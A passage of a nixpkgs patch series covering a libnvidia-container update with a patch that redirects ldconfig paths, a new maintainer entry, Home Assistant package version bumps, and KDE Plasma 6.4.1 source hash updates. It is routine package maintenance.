b7b8adfa7c79c326a1acb481a06a05d1463e810f..cf4b1905fd2127c28ee16649501be122 } diff --git a/src/nvc_ldcache.c b/src/nvc_ldcache.c -index db3b2f69692270e9058b2e26f18eb31677909d05..ae5def43b4cb3973af3aad55361265173ca938a7 100644 +index 0535090dafbae5a00acb707bbbb5a35dbcea4a7a..5de429f4c2ea62775403a5fc1ed0f23a6c88655c 100644 --- a/src/nvc_ldcache.c +++ b/src/nvc_ldcache.c -@@ -367,7 +367,7 @@ nvc_ldcache_update(struct nvc_context *ctx, const struct nvc_container *cnt) - if (validate_args(ctx, cnt != NULL) < 0) - return (-1); - -- argv = (char * []){cnt->cfg.ldconfig, "-f", "/etc/ld.so.conf", "-C", "/etc/ld.so.cache", cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL}; -+ argv = (char * []){cnt->cfg.ldconfig, "-f", "/tmp/ld.so.conf.nvidia-host", "-C", "/tmp/ld.so.cache.nvidia-host", cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL}; - if (*argv[0] == '@') { +@@ -482,8 +482,8 @@ nvc_ldcache_update(struct nvc_context *ctx, const struct nvc_container *cnt) + * See https://github.com/NVIDIA/libnvidia-container/issues/316 for an + * in-depth investigation. + */ +- char *argv_default[] = {cnt->cfg.ldconfig, "-f", "/etc/ld.so.conf", "-C", "/etc/ld.so.cache", cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL}; +- char *argv_with_compat_dir[] = {cnt->cfg.ldconfig, "-f", "/etc/ld.so.conf", "-C", "/etc/ld.so.cache", cnt->cuda_compat_dir, cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL}; ++ char *argv_default[] = {cnt->cfg.ldconfig, "-f", "/tmp/ld.so.conf.nvidia-host", "-C", "/tmp/ld.so.cache.nvidia-host", cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL}; ++ char *argv_with_compat_dir[] = {cnt->cfg.ldconfig, "-f", "/tmp/ld.so.conf.nvidia-host", "-C", "/tmp/ld.so.cache.nvidia-host", cnt->cuda_compat_dir, cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL}; + if ((cnt->flags & OPT_CUDA_COMPAT_MODE_LDCONFIG) && (cnt->cuda_compat_dir != NULL)) { /* - * We treat this path specially to be relative to the host filesystem. + * We include the cuda_compat_dir directory on the ldconfig diff --git a/pkgs/by-name/li/libnvidia-container/0002-nvc-nvidia-docker-compatible-binary-lookups.patch b/pkgs/by-name/li/libnvidia-container/0002-nvc-nvidia-docker-compatible-binary-lookups.patch index 8abcee55719d..0a2b3e47ac45 100644 --- a/pkgs/by-name/li/libnvidia-container/0002-nvc-nvidia-docker-compatible-binary-lookups.patch +++ b/pkgs/by-name/li/libnvidia-container/0002-nvc-nvidia-docker-compatible-binary-lookups.patch @@ -9,7 +9,7 @@ This patch maintains compatibility with NixOS' `virtualisation.docker.enableNvid 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/src/nvc_info.c b/src/nvc_info.c -index cf4b1905fd2127c28ee16649501be122d3be5261..cdfa19721bc913d8e2adb96d106cd65ee6111623 100644 +index 5eaef61ada5e955ab11c6a4eb8429c50468e3370..cac87500213e961e603494ac842d02522fc46a5e 100644 --- a/src/nvc_info.c +++ b/src/nvc_info.c @@ -249,10 +249,13 @@ find_binary_paths(struct error *err, struct dxcore_context* dxcore, struct nvc_d diff --git a/pkgs/by-name/li/libnvidia-container/package.nix b/pkgs/by-name/li/libnvidia-container/package.nix index 6f5119017601..41203992276e 100644 --- a/pkgs/by-name/li/libnvidia-container/package.nix +++ b/pkgs/by-name/li/libnvidia-container/package.nix @@ -32,13 +32,13 @@ let in stdenv.mkDerivation (finalAttrs: { pname = "libnvidia-container"; - version = "1.17.6"; + version = "1.17.8"; src = fetchFromGitHub { owner = "NVIDIA"; repo = "libnvidia-container"; tag = "v${finalAttrs.version}"; - hash = "sha256-kveP0Px9Fds7pS39aW+cqg2jtiQCMN2zG4GTGRqRrc0="; + hash = "sha256-OzjcYxnWjzgmrjERyPN3Ch3EQj4t1J5/TbATluoDESg="; }; patches = [ From 336878fe043366c5bcac3f31b6bc6cb117f4e59a Mon Sep 17 00:00:00 2001 From: Paul Meyer Date: Tue, 24 Jun 2025 11:53:20 +0200 Subject: [PATCH 35/73] libnvidia-container: add katexochen as maintainer Signed-off-by: Paul Meyer --- pkgs/by-name/li/libnvidia-container/package.nix | 1 + 1 file changed, 1 insertion(+) diff --git a/pkgs/by-name/li/libnvidia-container/package.nix b/pkgs/by-name/li/libnvidia-container/package.nix index 41203992276e..684d303c2e64 100644 --- a/pkgs/by-name/li/libnvidia-container/package.nix +++ b/pkgs/by-name/li/libnvidia-container/package.nix @@ -175,6 +175,7 @@ stdenv.mkDerivation (finalAttrs: { maintainers = with lib.maintainers; [ cpcloud msanft + katexochen ]; }; }) From 068d936b01123930afef3f388cececf739a4ae31 Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Tue, 24 Jun 2025 13:13:17 +0200 Subject: [PATCH 36/73] python3Packages.homeassistant-stubs: 2025.6.1 -> 2025.6.2 https://github.com/KapJI/homeassistant-stubs/releases/tag/2025.6.2 --- pkgs/servers/home-assistant/stubs.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/servers/home-assistant/stubs.nix b/pkgs/servers/home-assistant/stubs.nix index 469f84ad4442..f2f9e0777792 100644 --- a/pkgs/servers/home-assistant/stubs.nix +++ b/pkgs/servers/home-assistant/stubs.nix @@ -10,7 +10,7 @@ buildPythonPackage rec { pname = "homeassistant-stubs"; - version = "2025.6.1"; + version = "2025.6.2"; pyproject = true; disabled = python.version != home-assistant.python.version; @@ -19,7 +19,7 @@ buildPythonPackage rec { owner = "KapJI"; repo = "homeassistant-stubs"; tag = version; - hash = "sha256-JTSIVe25EXZ7Bslkcz8/wLFJDx3f78OGsfDodtHMZ/Y="; + hash = "sha256-Hdk7Lf0J4wgx+xhrKtBgBtO+DzCqQ2sih5DaoYcsWww="; }; build-system = [ From b48485fd372114c510e2b50a223d803df595a56d Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Tue, 24 Jun 2025 13:13:55 +0200 Subject: [PATCH 37/73] home-assistant.python.pkgs.pytest-homeassistant-custom-component: 0.13.251 -> 0.13.253 https://github.com/MatthewFlamm/pytest-homeassistant-custom-component/blob/refs/tags/0.13.253/CHANGELOG.md --- .../home-assistant/pytest-homeassistant-custom-component.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/servers/home-assistant/pytest-homeassistant-custom-component.nix b/pkgs/servers/home-assistant/pytest-homeassistant-custom-component.nix index cb9ef628b7f5..7357971e2c3d 100644 --- a/pkgs/servers/home-assistant/pytest-homeassistant-custom-component.nix +++ b/pkgs/servers/home-assistant/pytest-homeassistant-custom-component.nix @@ -18,7 +18,7 @@ buildPythonPackage rec { pname = "pytest-homeassistant-custom-component"; - version = "0.13.251"; + version = "0.13.253"; pyproject = true; disabled = pythonOlder "3.13"; @@ -27,7 +27,7 @@ buildPythonPackage rec { owner = "MatthewFlamm"; repo = "pytest-homeassistant-custom-component"; rev = "refs/tags/${version}"; - hash = "sha256-S+BC3ohAsY11SdZZdlETskCAopKeohgb16vMpko01YY="; + hash = "sha256-P2ZYOHUc8tTzwSSUGKdm+zQD4hgVpewkKSg3GRpF70M="; }; build-system = [ setuptools ]; From ac9539cd82b477082f13dcc79943774f7b07ad2c Mon Sep 17 00:00:00 2001 From: K900 Date: Tue, 24 Jun 2025 15:18:54 +0300 Subject: [PATCH 38/73] kdePackages: Plasma 6.4.0 -> 6.4.1 --- pkgs/kde/generated/sources/plasma.json | 414 ++++++++++++------------- 1 file changed, 207 insertions(+), 207 deletions(-) diff --git a/pkgs/kde/generated/sources/plasma.json b/pkgs/kde/generated/sources/plasma.json index a8efae02fd77..c41e5437e303 100644 --- a/pkgs/kde/generated/sources/plasma.json +++ b/pkgs/kde/generated/sources/plasma.json @@ -1,347 +1,347 @@ { "aurorae": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/aurorae-6.4.0.tar.xz", - "hash": "sha256-VjxChfQmhIJW6SyISgWKVy1Z31q5pMi5BzhSJuxKwLI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/aurorae-6.4.1.tar.xz", + "hash": "sha256-4hZ73nLjVc0AZXOeqNLNnR3z9D6beAn8VwKzs1K7/WU=" }, "bluedevil": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/bluedevil-6.4.0.tar.xz", - "hash": "sha256-8yb1EFCmDqwRNlKeFojg3ZAL1brP3cDn3ZQbLXV2rrk=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/bluedevil-6.4.1.tar.xz", + "hash": "sha256-mtR03dabzoVJgNMEL96JBb2UBZ/aqoAEJcds12J+Bu8=" }, "breeze": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/breeze-6.4.0.tar.xz", - "hash": "sha256-z9s48KTixCjpylpf0SQAtoBKvN1TWbY2+lMno1Eh6GY=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/breeze-6.4.1.tar.xz", + "hash": "sha256-T+AIX/ohsuOu9J3E5chi8i7xM5WpaBOHqZAwh0PwHFU=" }, "breeze-grub": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/breeze-grub-6.4.0.tar.xz", - "hash": "sha256-syzAxAqtGM7tbowlxlTc/ELUbd2Zm8oFBKCSlZhvYwI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/breeze-grub-6.4.1.tar.xz", + "hash": "sha256-c6yyJ5vbMtXpeqeHha4P6vBuQnQTtNvR3LZbu9zacwM=" }, "breeze-gtk": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/breeze-gtk-6.4.0.tar.xz", - "hash": "sha256-WFJjJxTE17d1SBUe9efe2t7TMfbpARGxbdcQ4Bu6j60=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/breeze-gtk-6.4.1.tar.xz", + "hash": "sha256-4Qj+nLx2oPUf2N+cYw05l4o8H7bPrznZqy9VVJRie1g=" }, "breeze-plymouth": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/breeze-plymouth-6.4.0.tar.xz", - "hash": "sha256-S1DBCbItJbH7YT/K5Qq+NbEAuQgyaudqPdgydMoPTPI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/breeze-plymouth-6.4.1.tar.xz", + "hash": "sha256-JSE/12TBsME2nbqFASXjsC2ZkKuQwcZ0PKodCHy3BkU=" }, "discover": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/discover-6.4.0.tar.xz", - "hash": "sha256-CfsdY6puw61W5gb0i24Q1Z7rN9m1J+VKIRtKedblIkI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/discover-6.4.1.tar.xz", + "hash": "sha256-80zqQ4qKCuC7b9E+QWTUnHoqmFfiBDAMzCdvLV+JgjA=" }, "drkonqi": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/drkonqi-6.4.0.tar.xz", - "hash": "sha256-BGqJ475WIGBu2tlF6/L1KHWlytZ0A8Ha86G/5ShoPqI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/drkonqi-6.4.1.tar.xz", + "hash": "sha256-REnekqvM46h7RyeWQffxcmqo0C5vMVSPDzJ3ks6C/UM=" }, "flatpak-kcm": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/flatpak-kcm-6.4.0.tar.xz", - "hash": "sha256-KCw6dSf4sdsTLaB992jXLFK7yj4n8iFvS6ahcx3QTeI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/flatpak-kcm-6.4.1.tar.xz", + "hash": "sha256-27UINtKXUF5efF/LKeIrb/IbUtBE7gf4QriZlMXapd4=" }, "kactivitymanagerd": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kactivitymanagerd-6.4.0.tar.xz", - "hash": "sha256-zVaf4lsNZwHDMOCPw+3lfVf/guluxtNH51dbsy+qurs=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kactivitymanagerd-6.4.1.tar.xz", + "hash": "sha256-tt1cG4TT0ucNt58W7O/iOsr1PEX9XCursu6ZS0ZsrJk=" }, "kde-cli-tools": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kde-cli-tools-6.4.0.tar.xz", - "hash": "sha256-T06+18F6JQecVO8DGSmsVdZ3es089ZXKY0P00KTwC6k=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kde-cli-tools-6.4.1.tar.xz", + "hash": "sha256-LZCrDANPudKBZ1Dams45twi3EtP3NBZj67v+iNWwLKQ=" }, "kde-gtk-config": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kde-gtk-config-6.4.0.tar.xz", - "hash": "sha256-ygZtqEJyKAw/1qGBlw2U854Re+yM7pHXGi4lLCFF788=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kde-gtk-config-6.4.1.tar.xz", + "hash": "sha256-S79X5NeYqJnD8SM1BClZrvz11q81SwSJXk6N3ujIxD4=" }, "kdecoration": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kdecoration-6.4.0.tar.xz", - "hash": "sha256-pMyMS8dB0KQj11DO1m4UG5uY/McUaKshDlTaOCFTtYA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kdecoration-6.4.1.tar.xz", + "hash": "sha256-obRAHtr3/iFjw+HKtUjZPDExlXuFNPISSe787uSW4SI=" }, "kdeplasma-addons": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kdeplasma-addons-6.4.0.tar.xz", - "hash": "sha256-XwS3FmjLhADglL7Oa7bHRra7k2W8EWk4tm2Kq9hJNVo=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kdeplasma-addons-6.4.1.tar.xz", + "hash": "sha256-iUv51ID9vwo+AFczkVNaQemlfO5yP7rQ+NosFtKZ0vY=" }, "kgamma": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kgamma-6.4.0.tar.xz", - "hash": "sha256-IRQh+vjZAB3JNgkv0fTyEVNIWvQ08AcfVdIovRo5xUg=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kgamma-6.4.1.tar.xz", + "hash": "sha256-zClBxUYyHA9ACHqB4sPY1E6jhFA0wWQXmmOEtU7w+5A=" }, "kglobalacceld": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kglobalacceld-6.4.0.tar.xz", - "hash": "sha256-9+Z6c2e2C9RTBVjvkZgN+ha7UA1VFutonrUAQeELDzI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kglobalacceld-6.4.1.tar.xz", + "hash": "sha256-PuOK9MlVHeZAoYZ9J4NS2BcUaSz3AAwg0Z3CYuBL9DM=" }, "kinfocenter": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kinfocenter-6.4.0.tar.xz", - "hash": "sha256-TS3q9MH/dv8QDtawfXyxWLoRbEwiG3tfeyVEAoUFRJQ=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kinfocenter-6.4.1.tar.xz", + "hash": "sha256-IOr7rnikN/dnuLbpSTh1sjADP5dgRUcy6BBIPIISeSc=" }, "kmenuedit": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kmenuedit-6.4.0.tar.xz", - "hash": "sha256-SuSmetygfhDCR1uaGay9KD0YQKmWu8CE2bGyN8fm74g=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kmenuedit-6.4.1.tar.xz", + "hash": "sha256-VdsXXw897aYVS/sMchrfGD9jwTS3eFjJ+74IWK6cd3M=" }, "kpipewire": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kpipewire-6.4.0.tar.xz", - "hash": "sha256-1ZdmWk7lekmT2QjmIVEkKumlo6JedtC6AD85ymhp41o=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kpipewire-6.4.1.tar.xz", + "hash": "sha256-Npbf0ZtT5e+h57xpDDggkZuLvcDXj5Z3nMOzGekDX+I=" }, "krdp": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/krdp-6.4.0.tar.xz", - "hash": "sha256-78FnobeNIWoopi/TzJmBhQKGK6hB7/F1k+4VchzhRdU=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/krdp-6.4.1.tar.xz", + "hash": "sha256-zoGR8xXF9HBGuZh/Uv/wqI/8P51AmJ7yQj8QuY4sWMI=" }, "kscreen": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kscreen-6.4.0.tar.xz", - "hash": "sha256-5M7giQpTQFMVH6XoU3Ktgukmm5TNPcMytzfDbEcRcn8=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kscreen-6.4.1.tar.xz", + "hash": "sha256-w6KFacTwkt74RWTpFi64p/poGo9GWKFNgkNuohdU3Fs=" }, "kscreenlocker": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kscreenlocker-6.4.0.tar.xz", - "hash": "sha256-uEAgK6a1vXgyqyEWvu4sjjhvqbhE5tsOQlqEAGtmmPo=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kscreenlocker-6.4.1.tar.xz", + "hash": "sha256-yEnck5oFCibycDk/i1nouG1nGYOnUuAUr3yJoclVuSU=" }, "ksshaskpass": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/ksshaskpass-6.4.0.tar.xz", - "hash": "sha256-zjx7qfFmOOteA3iCFEioS5oGGSKL6BluVcOV/U10OAY=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/ksshaskpass-6.4.1.tar.xz", + "hash": "sha256-VJXbLUX5sqxQqBOC9+OMmauD1+o0rc9ysFwmDZ2KNDM=" }, "ksystemstats": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/ksystemstats-6.4.0.tar.xz", - "hash": "sha256-4PiFWk25FQgGa52lEI3bzki7rdpku5ZlOsL7MS/BRo4=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/ksystemstats-6.4.1.tar.xz", + "hash": "sha256-pwp0070kEW9gAQhrlCzJ1p91FPP1t8KgOC1dwoHn8Ko=" }, "kwallet-pam": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwallet-pam-6.4.0.tar.xz", - "hash": "sha256-RQ5Na4BMWX61EVkADhk2iJJuTYIlrhmhYn4l0R/ri14=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwallet-pam-6.4.1.tar.xz", + "hash": "sha256-BNTXB1y5PKwQp+BQSDbZYcei7aTwiYe7UA+ScgApi3w=" }, "kwayland": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwayland-6.4.0.tar.xz", - "hash": "sha256-CmSafVAjcCLJsMDz798qe/vreU43zzdcohkOZLXR2x8=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwayland-6.4.1.tar.xz", + "hash": "sha256-f48oQSL/2kTF4dZEJ76QWcoj9an78JLiod5tQd5FhiU=" }, "kwayland-integration": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwayland-integration-6.4.0.tar.xz", - "hash": "sha256-olIYm9HKCRWbtweBb/nVUqWzAJMpyTCg6YN3KEvw8Rw=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwayland-integration-6.4.1.tar.xz", + "hash": "sha256-IQk2AksNGsr5zZOo94SjSBBhno6zVvaPAgVHU1QK5gs=" }, "kwin": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwin-6.4.0.tar.xz", - "hash": "sha256-DTSSMXpxmmRb8ok/ysIbspeWBrrzcDYQ5Va1961U3mo=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwin-6.4.1.tar.xz", + "hash": "sha256-1OQwbJbMLouoYw6sMjT7wIVoWwCrxeWvwsLBxsb8pNQ=" }, "kwin-x11": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwin-x11-6.4.0.tar.xz", - "hash": "sha256-dtfAGOtu5lcpLIkquc50CYKQ7uB8P9+p18UxSX2OW3c=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwin-x11-6.4.1.tar.xz", + "hash": "sha256-eYy9ba9fstfr20lOaxLzmp7A4CWicjNiEhOWYUEgfAs=" }, "kwrited": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwrited-6.4.0.tar.xz", - "hash": "sha256-ZCxWdKsNlcoKQtbRstrKtf+/wGcZgZUo+iUVPGimRUo=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwrited-6.4.1.tar.xz", + "hash": "sha256-qApe1F7WM/Fc86QrLZVmCNnmpaePJn3zOslqr8wg2NQ=" }, "layer-shell-qt": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/layer-shell-qt-6.4.0.tar.xz", - "hash": "sha256-K55BM9Cb6Fji7mEHpWir0xoWC0ZlRatLZjEcaDlcd7A=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/layer-shell-qt-6.4.1.tar.xz", + "hash": "sha256-54HK3sALTDibkUPLOkDfd4iqTU0hHIhH9rm2UXbm6c4=" }, "libkscreen": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/libkscreen-6.4.0.tar.xz", - "hash": "sha256-4kBHbhXFfoWnkQf++9zLBwgoiaSUtXqlx8Tm8gjpEho=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/libkscreen-6.4.1.tar.xz", + "hash": "sha256-dBU8GUDd7sCZuhIMenm7yzn/42NE581cQ2CHdq9bLRQ=" }, "libksysguard": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/libksysguard-6.4.0.tar.xz", - "hash": "sha256-v9C695c0B0RAk+E6XOKzEM7lhuO7xdThB4W8Gg1FpmM=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/libksysguard-6.4.1.tar.xz", + "hash": "sha256-fDOUnb3MzuzjX779JEpESbI7UHHgytCC+RruZPeygeE=" }, "libplasma": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/libplasma-6.4.0.tar.xz", - "hash": "sha256-/4bw2QYlS7yfkQfzg7Gfu1un2yQ/q38tfSeP6DFGNUw=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/libplasma-6.4.1.tar.xz", + "hash": "sha256-O6Tx+KmWix0zlWT5GzOBjoDmEt5+U0WREXJGlj0scXs=" }, "milou": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/milou-6.4.0.tar.xz", - "hash": "sha256-7SWKx4tH2O7oFxOIq8EtxzuvP+gkK8EZpqMUMdfbPzA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/milou-6.4.1.tar.xz", + "hash": "sha256-IZQ2nUxFpTe3kyK/3T7MUlL7Vd/Y968hA8j3t9ouUIA=" }, "ocean-sound-theme": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/ocean-sound-theme-6.4.0.tar.xz", - "hash": "sha256-r6ZyqRyuqaNPn+aZA7/02M+ZsWOT21LVRvq+K1uOp3M=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/ocean-sound-theme-6.4.1.tar.xz", + "hash": "sha256-o/ddckD0SKRnOT6xTxQxrAsFNf5JKYyf+hdLAFAJl/M=" }, "oxygen": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/oxygen-6.4.0.tar.xz", - "hash": "sha256-p29NbjoPnvZzq3W3sULfUTbYevHwlMz63Svm5s5sLCQ=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/oxygen-6.4.1.tar.xz", + "hash": "sha256-b5siN5HxUR5v7sS2i6YDThJF4D6iHRMf4YxKhJdVRqU=" }, "oxygen-sounds": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/oxygen-sounds-6.4.0.tar.xz", - "hash": "sha256-Wz1d8nOQ7ggmCWSypo1Zl/L1B9F1MRRg+6Gs6kFNyFI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/oxygen-sounds-6.4.1.tar.xz", + "hash": "sha256-pv3YCBYyLq0GRdiJUQpUAh/UvYGEiBTfh1SM8m4HaD8=" }, "plasma-activities": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-activities-6.4.0.tar.xz", - "hash": "sha256-Go8DS7iVx1d5jFvoeiDbVGlvRe7ePXG4uBXPZmz864w=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-activities-6.4.1.tar.xz", + "hash": "sha256-DsBpK13LBfyC0ef3KFq4LaImndt9Axi49KYQONpE2WM=" }, "plasma-activities-stats": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-activities-stats-6.4.0.tar.xz", - "hash": "sha256-kxNliQbYG/KW2emKwZeQuD6Ii6ifESPGKwpy+TjyjuY=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-activities-stats-6.4.1.tar.xz", + "hash": "sha256-rfX0v6dY/0EwmXjvULv1/wpZbq+RNzhtS4cOe8wjMLc=" }, "plasma-browser-integration": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-browser-integration-6.4.0.tar.xz", - "hash": "sha256-FH4LixBeR8o/xpTdLYbsvqp8PDFdi/PaDUtuNagp56Q=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-browser-integration-6.4.1.tar.xz", + "hash": "sha256-eqDYwMci6fdjuu9cFTp/iC9JDbz5lWPQRye3WcXC1jQ=" }, "plasma-desktop": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-desktop-6.4.0.tar.xz", - "hash": "sha256-GOEUAzwYLSY8k39bxBeTJSkx3NrCKwTUnTOgEJuyrrI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-desktop-6.4.1.tar.xz", + "hash": "sha256-tc979WDIpK/1oSGc+kF6h2uYIHGju4AdKv9T2/GKBYQ=" }, "plasma-dialer": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-dialer-6.4.0.tar.xz", - "hash": "sha256-pyPbCGLDWhw48Fn8zs8rUECrOiv/+gHPY7fh+yUh45A=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-dialer-6.4.1.tar.xz", + "hash": "sha256-8bIXU1QRiWxHwQ4cc99Zsp9mQwU8cdfuHWXqLiUr0Q4=" }, "plasma-disks": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-disks-6.4.0.tar.xz", - "hash": "sha256-lMle0b1JREjIHjU2Dci0muBazsExZR7IFxb0pSIY6pA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-disks-6.4.1.tar.xz", + "hash": "sha256-yY+aDVMimCqQhJfXzAKGeCVIYle44lRi0ZfzNgEcUxQ=" }, "plasma-firewall": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-firewall-6.4.0.tar.xz", - "hash": "sha256-8MCE2Yxff3Kjc1X9vN/nwv8CBe0kAJAUQGqSRNZIRoU=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-firewall-6.4.1.tar.xz", + "hash": "sha256-ctXVNJPuOQGEf+Y8+XamjX9gGwh40spnBOhkoFwPv5w=" }, "plasma-integration": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-integration-6.4.0.tar.xz", - "hash": "sha256-pxhoIFKN72+Ie2Qu+nv7TE4UjRTmXvCreH/DWmLigdA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-integration-6.4.1.tar.xz", + "hash": "sha256-EoE9sNZoVVBXAammIi5qUTpVV4kDJfEMofy/eH2R7eM=" }, "plasma-mobile": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-mobile-6.4.0.tar.xz", - "hash": "sha256-1m4fkOvV+ZPueDW3+K6suq0VtB5W3wqyq65Ve0Ck2Dg=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-mobile-6.4.1.tar.xz", + "hash": "sha256-+1ivtVRjh7bYN7rGEyNXTgywKBvKob3gH0KKzsWZ8xY=" }, "plasma-nano": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/plasma-nano-6.4.0.tar.xz", - "hash": "sha256-gF400TsjLpf5D3pU/DnLx5qU2ZZ83e3t4GAgKD4+n/E=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/plasma-nano-6.4.1.tar.xz", + "hash": "sha256-dg9AAdpOMJqWH27gpbl+df+cyzLwQgcLNAz/cHhbMRM=" }, "plasma-nm": { - "version": "6.4.0", - "url": 